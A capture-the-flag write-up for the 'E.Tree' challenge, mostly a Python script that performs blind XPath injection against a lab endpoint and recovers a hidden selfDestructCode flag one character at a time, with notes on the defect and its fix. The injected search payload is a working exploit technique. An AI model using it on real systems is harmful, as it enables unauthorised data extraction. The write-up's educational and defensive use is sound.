E.Tree was a Python Flask application that used XPath to parse XML files. We were presented with an example XML file in which we could see that some users have an additional selfDestructCode element set. Knowing this, we were able to perform an error-based XPath injection to determine the flag.
Solution
"""Character-by-character XPath injection oracle used in the E.Tree write-up.

The challenge endpoint concatenates the user-supplied ``search`` value into an
XPath expression.  The script injects a ``substring(...)`` predicate so that the
server's answer depends on whether one character of the ``selfDestructCode``
node matches the guess; a response containing ``exists`` is treated as "yes".
One HTTP request is made per candidate character and position.

From a defender's point of view the enabling defect is server-side string
concatenation into the XPath query: passing user input as an XPath variable
(or strictly validating it) removes the injection point, and a uniform response
for found/not-found removes the oracle.
"""
import requests
import string
from time import sleep

# First half of the flag as recorded by the author; it is never referenced by
# the loop below, which only extends ``flag``.
flag_pt1 = "CHTB{Th3_3xTr4_l3v3l_"
flag = "4Cc3s$_c0nTr0l}"
# Challenge instance used in the write-up (value taken from the original script).
url = "http://139.59.168.47:30661/api/search"

# Each time a successful login is seen, restart loop
restart = True
# 1-based offset handed to XPath substring(): the next character after the
# already-known text in ``flag``.  NOTE(review): with ``flag`` ending in "}"
# this looks like the author's final state; confirm the intended start value.
count = len(flag) + 1
while restart:
    restart = False
    # Candidate alphabet tried in order for the current position.
    for char in "_" + string.ascii_letters + string.digits + "!#$%^()@{}£&*-=+.,~:;[]":
        # Update position index for the 2 seperate flag parts
        # The ``search`` value is injected verbatim into the server's XPath
        # query; the predicate compares one character of selfDestructCode
        # with ``char`` and the trailing ``or ''='`` balances the quotes.
        post_data = {
            "search": "' or substring((/military/district[position()=3]/staff[position()=2]/selfDestructCode),"
            + str(count)
            + ",1)=\""
            + char
            + "\" or ''=' "
        }
        print(post_data)
        try:
            r = requests.post(url, json=post_data, headers={'Content-Type': 'application/json'})
        except BaseException:
            # NOTE(review): swallowing the error leaves ``r`` unbound on the
            # first failure (NameError below) or stale from the previous
            # iteration afterwards; the character is then judged on an old
            # response.
            pass
        # Correct char results in "successful password"
        # ``exists`` in the body is the boolean oracle for a matching character.
        if 'exists' in r.text:
            restart = True
            count += 1
            flag += char
            print(flag)
            # Exit if "}" gives a valid redirect
            if char == "}":
                print("\nFlag: " + flag)
                exit(0)
            # Leave the alphabet loop so the outer loop restarts at the next position.
            break
        # One request per second per candidate; also keeps the oracle traffic slow.
        sleep(1)